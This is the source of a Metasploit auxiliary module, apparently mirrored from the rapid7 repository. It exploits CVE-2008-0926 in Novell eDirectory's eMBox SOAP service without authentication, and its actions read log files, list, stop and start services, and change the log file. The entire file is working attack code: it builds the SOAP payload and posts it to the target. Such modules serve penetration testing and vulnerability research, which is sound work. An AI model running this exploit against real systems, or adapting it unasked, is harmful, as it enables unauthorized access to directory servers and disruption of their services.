Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Exploit::Remote::HttpClient

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Novell eDirectory eMBox Unauthenticated File Access',

15
        'Description' => %q{

16
          This module will access Novell eDirectory's eMBox service and can run the

17
          following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,

18
          STOP_SERVICE, START_SERVICE, SET_LOGFILE.

19
        },

20
        'References' => [

21
          [ 'CVE', '2008-0926' ],

22
          [ 'BID', '28441' ],

23
          [ 'OSVDB', '43690' ]

24
        ],

25
        'Author' => [

26
          'Nicob',

27
          'MC', # Initial Metasploit module

28
          'sinn3r'

29
        ],

30
        'License' => MSF_LICENSE,

31
        'Notes' => {

32
          'Stability' => [CRASH_SAFE],

33
          'SideEffects' => [IOC_IN_LOGS],

34
          'Reliability' => []

35
        },

36
        'Actions' => [

37
          [

38
            'GET_DN',

39
            {

40
              'Description' => 'Get DN',

41
              'CMD' => 'novell.embox.connmgr.serverinfo',

42
              'PATTERN' => %r{<ServerDN dt="Binary">(.*)</ServerDN>},

43
              'USE_PARAM' => false

44
            }

45
          ],

46
          [

47
            'READ_LOGS',

48
            {

49
              'Description' => 'Read all the log files',

50
              'CMD' => 'logger.readlog',

51
              'PATTERN' => %r{<LogFileData>(.*)</LogFileData>},

52
              'USE_PARAM' => false

53
            }

54
          ],

55
          [

56
            'LIST_SERVICES',

57
            {

58
              'Description' => 'List services',

59
              'CMD' => 'novell.embox.service.getServiceList',

60
              'PATTERN' => %r{<DSService:Message dt="Binary">(.*)</DSService:Message>},

61
              'USE_PARAM' => false

62
            }

63
          ],

64
          [

65
            'STOP_SERVICE',

66
            {

67
              'Description' => 'Stop a service',

68
              'CMD' => 'novell.embox.service.stopService',

69
              'PATTERN' => %r{<DSService:Message dt="Binary">(.*)</DSService:Message>},

70
              'PARAM' => '<Parameters><params xmlns:DSService="service.dtd">' \

71
                               '<DSService:moduleName>__PARAM__</DSService:moduleName>' \

72
                               '</params></Parameters>',

73
              'USE_PARAM' => true

74
            }

75
          ],

76
          [

77
            'START_SERVICE',

78
            {

79
              'Description' => 'Start a service',

80
              'CMD' => 'novell.embox.service.startService',

81
              'PATTERN' => %r{<DSService:Message dt="Binary">(.*)</DSService:Message>},

82
              'PARAM' => '<Parameters>' \

83
                               '<params xmlns:DSService="service.dtd">' \

84
                               '<DSService:moduleName>__PARAM__</DSService:moduleName>' \

85
                               '</params></Parameters>',

86
              'USE_PARAM' => true

87
            }

88
          ],

89
          [

90
            'SET_LOGFILE',

91
            {

92
              'Description' => 'Read Log File',

93
              'CMD' => 'logger.setloginfo',

94
              'PATTERN' => %r{<Logger:Message dt="Binary">(.*)</Logger:Message>},

95
              'PARAM' => '<Parameters><params><logFile>__PARAM__</logFile>' \

96
                               '<logOptionAppend/></params></Parameters>',

97
              'USE_PARAM' => true

98
            }

99
          ]

100
        ],

101
        'DefaultAction' => 'LIST_SERVICES'

102
      )

103
    )

104


105
    register_options(

106
      [

107
        Opt::RPORT(8028),

108
        OptString.new('PARAM', [false, 'Specify a parameter for the action'])

109
      ]

110
    )

111
  end

112


113
  def run

114
    if action.opts['USE_PARAM']

115
      if datastore['PARAM'].nil? || datastore['PARAM'].empty?

116
        print_error("You must supply a parameter for action: #{action.name}")

117
        return

118
      else

119
        param = action.opts['PARAM'].gsub('__PARAM__', datastore['PARAM'])

120
      end

121
    else

122
      param = '<Parameters><params/></Parameters>'

123
    end

124


125
    template = %(<?xml version="1.0"?>

126
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">

127
    <SOAP-ENV:Header/>

128
    <SOAP-ENV:Body>

129
    <dispatch>

130
    <Action>#{action.opts['CMD']}</Action>

131
    <Object/>#{param}</dispatch>

132
    </SOAP-ENV:Body>

133
    </SOAP-ENV:Envelope>)

134


135
    template = template.gsub(/^ {4}/, '')

136
    template = template.gsub("\n", '')

137


138
    connect

139
    print_status("Sending command: #{action.name}...")

140
    res = send_request_cgi({

141
      'method' => 'POST',

142
      'uri' => '/SOAP',

143
      'data' => template + "\n\n",

144
      'headers' =>

145
        {

146
          'Content-Type' => 'text/xml',

147
          'SOAPAction' => '"' + Rex::Text.rand_text_alpha_upper(rand(1..25)) + '"'

148
        }

149
    }, 25)

150


151
    if res.nil?

152
      print_error('Did not get a response from server')

153
      return

154
    end

155


156
    raw_data = res.body.scan(/#{action.opts['PATTERN']}/).flatten[0]

157
    print_line("\n" + Rex::Text.decode_base64(raw_data))

158


159
    disconnect

160
  end

161
end

162


163